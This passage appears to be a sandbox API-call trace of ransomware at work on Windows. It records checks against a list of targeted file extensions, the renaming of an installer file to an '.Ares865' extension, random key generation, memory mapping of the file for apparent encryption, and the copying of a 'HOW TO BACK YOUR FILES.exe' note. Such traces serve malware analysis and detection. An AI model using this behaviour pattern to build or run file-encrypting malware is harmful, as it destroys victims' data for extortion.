(lpString1="msi", lpString2="abx") returned 1 [0077.408] lstrlenW (lpString="accdb") returned 5 [0077.408] lstrcmpiW (lpString1="4.msi", lpString2="accdb") returned -1 [0077.408] lstrlenW (lpString="accdc") returned 5 [0077.408] lstrcmpiW (lpString1="4.msi", lpString2="accdc") returned -1 [0077.408] lstrlenW (lpString="accde") returned 5 [0077.408] lstrcmpiW (lpString1="4.msi", lpString2="accde") returned -1 [0077.408] lstrlenW (lpString="accdr") returned 5 [0077.408] lstrcmpiW (lpString1="4.msi", lpString2="accdr") returned -1 [0077.408] lstrlenW (lpString="accdt") returned 5 [0077.408] lstrcmpiW (lpString1="4.msi", lpString2="accdt") returned -1 [0077.408] lstrlenW (lpString="accdw") returned 5 [0077.408] lstrcmpiW (lpString1="4.msi", lpString2="accdw") returned -1 [0077.408] lstrlenW (lpString="accft") returned 5 [0077.408] lstrcmpiW (lpString1="4.msi", lpString2="accft") returned -1 [0077.408] lstrlenW (lpString="adb") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0077.409] lstrlenW (lpString="adb") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0077.409] lstrlenW (lpString="ade") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0077.409] lstrlenW (lpString="adf") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0077.409] lstrlenW (lpString="adn") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0077.409] lstrlenW (lpString="adp") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0077.409] lstrlenW (lpString="alf") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0077.409] lstrlenW (lpString="ask") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0077.409] lstrlenW (lpString="btr") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0077.409] lstrlenW (lpString="cat") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0077.409] lstrlenW (lpString="cdb") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0077.409] lstrlenW (lpString="ckp") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0077.409] lstrlenW (lpString="cma") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0077.409] lstrlenW (lpString="cpd") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0077.409] lstrlenW (lpString="dacpac") returned 6 [0077.409] lstrcmpiW (lpString1="64.msi", lpString2="dacpac") returned -1 [0077.409] lstrlenW (lpString="dad") returned 3 [0077.409] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0077.409] lstrlenW (lpString="dadiagrams") returned 10 [0077.409] lstrcmpiW (lpString1="um_x64.msi", lpString2="dadiagrams") returned 1 [0077.409] lstrlenW (lpString="daschema") returned 8 [0077.409] lstrcmpiW (lpString1="_x64.msi", lpString2="daschema") returned -1 [0077.409] lstrlenW (lpString="db-journal") returned 10 [0077.409] lstrcmpiW (lpString1="um_x64.msi", lpString2="db-journal") returned 1 [0077.410] lstrlenW (lpString="db-shm") returned 6 [0077.410] lstrcmpiW (lpString1="64.msi", lpString2="db-shm") returned -1 [0077.410] lstrlenW (lpString="db-wal") returned 6 [0077.410] lstrcmpiW (lpString1="64.msi", lpString2="db-wal") returned -1 [0077.410] lstrlenW (lpString="dbc") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0077.410] lstrlenW (lpString="dbs") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0077.410] lstrlenW (lpString="dbt") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0077.410] lstrlenW (lpString="dbv") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0077.410] lstrlenW (lpString="dbx") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0077.410] lstrlenW (lpString="dcb") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0077.410] lstrlenW (lpString="dct") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0077.410] lstrlenW (lpString="dcx") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0077.410] lstrlenW (lpString="ddl") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0077.410] lstrlenW (lpString="dlis") returned 4 [0077.410] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0077.410] lstrlenW (lpString="dp1") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0077.410] lstrlenW (lpString="dqy") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0077.410] lstrlenW (lpString="dsk") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0077.410] lstrlenW (lpString="dsn") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0077.410] lstrlenW (lpString="dtsx") returned 4 [0077.410] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0077.410] lstrlenW (lpString="dxl") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0077.410] lstrlenW (lpString="eco") returned 3 [0077.410] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0077.411] lstrlenW (lpString="ecx") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0077.411] lstrlenW (lpString="edb") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0077.411] lstrlenW (lpString="epim") returned 4 [0077.411] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0077.411] lstrlenW (lpString="fcd") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0077.411] lstrlenW (lpString="fdb") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0077.411] lstrlenW (lpString="fic") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0077.411] lstrlenW (lpString="flexolibrary") returned 12 [0077.411] lstrcmpiW (lpString1="imum_x64.msi", lpString2="flexolibrary") returned 1 [0077.411] lstrlenW (lpString="fm5") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0077.411] lstrlenW (lpString="fmp") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0077.411] lstrlenW (lpString="fmp12") returned 5 [0077.411] lstrcmpiW (lpString1="4.msi", lpString2="fmp12") returned -1 [0077.411] lstrlenW (lpString="fmpsl") returned 5 [0077.411] lstrcmpiW (lpString1="4.msi", lpString2="fmpsl") returned -1 [0077.411] lstrlenW (lpString="fol") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0077.411] lstrlenW (lpString="fp3") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0077.411] lstrlenW (lpString="fp4") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0077.411] lstrlenW (lpString="fp5") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0077.411] lstrlenW (lpString="fp7") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0077.411] lstrlenW (lpString="fpt") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0077.411] lstrlenW (lpString="frm") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0077.411] lstrlenW (lpString="gdb") returned 3 [0077.411] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0077.411] lstrlenW (lpString="gdb") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0077.412] lstrlenW (lpString="grdb") returned 4 [0077.412] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0077.412] lstrlenW (lpString="gwi") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0077.412] lstrlenW (lpString="hdb") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0077.412] lstrlenW (lpString="his") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0077.412] lstrlenW (lpString="ib") returned 2 [0077.412] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0077.412] lstrlenW (lpString="idb") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0077.412] lstrlenW (lpString="ihx") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0077.412] lstrlenW (lpString="itdb") returned 4 [0077.412] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0077.412] lstrlenW (lpString="itw") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0077.412] lstrlenW (lpString="jet") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0077.412] lstrlenW (lpString="jtx") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0077.412] lstrlenW (lpString="kdb") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0077.412] lstrlenW (lpString="kexi") returned 4 [0077.412] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0077.412] lstrlenW (lpString="kexic") returned 5 [0077.412] lstrcmpiW (lpString1="4.msi", lpString2="kexic") returned -1 [0077.412] lstrlenW (lpString="kexis") returned 5 [0077.412] lstrcmpiW (lpString1="4.msi", lpString2="kexis") returned -1 [0077.412] lstrlenW (lpString="lgc") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0077.412] lstrlenW (lpString="lwx") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0077.412] lstrlenW (lpString="maf") returned 3 [0077.412] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0077.412] lstrlenW (lpString="maq") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0077.413] lstrlenW (lpString="mar") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0077.413] lstrlenW (lpString="marshal") returned 7 [0077.413] lstrcmpiW (lpString1="x64.msi", lpString2="marshal") returned 1 [0077.413] lstrlenW (lpString="mas") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0077.413] lstrlenW (lpString="mav") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0077.413] lstrlenW (lpString="maw") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0077.413] lstrlenW (lpString="mdbhtml") returned 7 [0077.413] lstrcmpiW (lpString1="x64.msi", lpString2="mdbhtml") returned 1 [0077.413] lstrlenW (lpString="mdn") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0077.413] lstrlenW (lpString="mdt") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0077.413] lstrlenW (lpString="mfd") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0077.413] lstrlenW (lpString="mpd") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0077.413] lstrlenW (lpString="mrg") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0077.413] lstrlenW (lpString="mud") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0077.413] lstrlenW (lpString="mwb") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0077.413] lstrlenW (lpString="myd") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0077.413] lstrlenW (lpString="ndf") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0077.413] lstrlenW (lpString="nnt") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0077.413] lstrlenW (lpString="nrmlib") returned 6 [0077.413] lstrcmpiW (lpString1="64.msi", lpString2="nrmlib") returned -1 [0077.413] lstrlenW (lpString="ns2") returned 3 [0077.413] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0077.413] lstrlenW (lpString="ns3") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0077.414] lstrlenW (lpString="ns4") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0077.414] lstrlenW (lpString="nsf") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0077.414] lstrlenW (lpString="nv") returned 2 [0077.414] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0077.414] lstrlenW (lpString="nv2") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0077.414] lstrlenW (lpString="nwdb") returned 4 [0077.414] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0077.414] lstrlenW (lpString="nyf") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0077.414] lstrlenW (lpString="odb") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0077.414] lstrlenW (lpString="odb") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0077.414] lstrlenW (lpString="oqy") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0077.414] lstrlenW (lpString="ora") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0077.414] lstrlenW (lpString="orx") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0077.414] lstrlenW (lpString="owc") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0077.414] lstrlenW (lpString="p96") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0077.414] lstrlenW (lpString="p97") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0077.414] lstrlenW (lpString="pan") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0077.414] lstrlenW (lpString="pdb") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0077.414] lstrlenW (lpString="pdm") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0077.414] lstrlenW (lpString="pnz") returned 3 [0077.414] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0077.415] lstrlenW (lpString="qry") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0077.415] lstrlenW (lpString="qvd") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0077.415] lstrlenW (lpString="rbf") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0077.415] lstrlenW (lpString="rctd") returned 4 [0077.415] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0077.415] lstrlenW (lpString="rod") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0077.415] lstrlenW (lpString="rodx") returned 4 [0077.415] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0077.415] lstrlenW (lpString="rpd") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0077.415] lstrlenW (lpString="rsd") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0077.415] lstrlenW (lpString="sas7bdat") returned 8 [0077.415] lstrcmpiW (lpString1="_x64.msi", lpString2="sas7bdat") returned -1 [0077.415] lstrlenW (lpString="sbf") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0077.415] lstrlenW (lpString="scx") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0077.415] lstrlenW (lpString="sdb") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0077.415] lstrlenW (lpString="sdc") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0077.415] lstrlenW (lpString="sdf") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0077.415] lstrlenW (lpString="sis") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0077.415] lstrlenW (lpString="spq") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0077.415] lstrlenW (lpString="te") returned 2 [0077.415] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0077.415] lstrlenW (lpString="teacher") returned 7 [0077.415] lstrcmpiW (lpString1="x64.msi", lpString2="teacher") returned 1 [0077.415] lstrlenW (lpString="tmd") returned 3 [0077.415] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0077.415] lstrlenW (lpString="tps") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0077.416] lstrlenW (lpString="trc") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0077.416] lstrlenW (lpString="trc") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0077.416] lstrlenW (lpString="trm") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0077.416] lstrlenW (lpString="udb") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0077.416] lstrlenW (lpString="udl") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0077.416] lstrlenW (lpString="usr") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0077.416] lstrlenW (lpString="v12") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0077.416] lstrlenW (lpString="vis") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0077.416] lstrlenW (lpString="vpd") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0077.416] lstrlenW (lpString="vvv") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0077.416] lstrlenW (lpString="wdb") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0077.416] lstrlenW (lpString="wmdb") returned 4 [0077.416] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0077.416] lstrlenW (lpString="wrk") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0077.416] lstrlenW (lpString="xdb") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0077.416] lstrlenW (lpString="xld") returned 3 [0077.416] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0077.416] lstrlenW (lpString="xmlff") returned 5 [0077.416] lstrcmpiW (lpString1="4.msi", lpString2="xmlff") returned -1 [0077.416] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865") returned 149 [0077.416] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.ares865"), dwFlags=0x1) returned 1 [0077.455] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xa4 [0077.455] GetFileSizeEx (in: hFile=0xa4, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=147456) returned 1 [0077.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0077.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0077.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0077.456] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0077.456] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0077.457] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.457] CreateFileMappingW (hFile=0xa4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x24300, lpName=0x0) returned 0x15c [0077.483] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24300) returned 0x420000 [0077.624] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0077.625] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0077.625] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0077.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0077.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0077.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0077.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0077.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0077.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9fb0 [0077.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0077.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9fb0 | out: hHeap=0x2b0000) returned 1 [0077.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0077.626] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0077.627] CloseHandle (hObject=0x15c) returned 1 [0077.627] CloseHandle (hObject=0xa4) returned 1 [0077.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0077.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0077.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0077.628] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7a0c00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfd7a0c00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfd7a0c00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0077.628] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0077.628] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0077.628] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0077.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2920 | out: hHeap=0x2b0000) returned 1 [0077.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0077.628] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned 83 [0077.628] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0077.628] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.628] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0077.629] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.629] GetLastError () returned 0x20 [0077.629] Sleep (dwMilliseconds=0xc8) [0077.909] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0077.910] GetLastError () returned 0x0 [0077.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0077.912] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0077.913] CloseHandle (hObject=0x15c) returned 1 [0077.914] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0077.914] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.915] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, 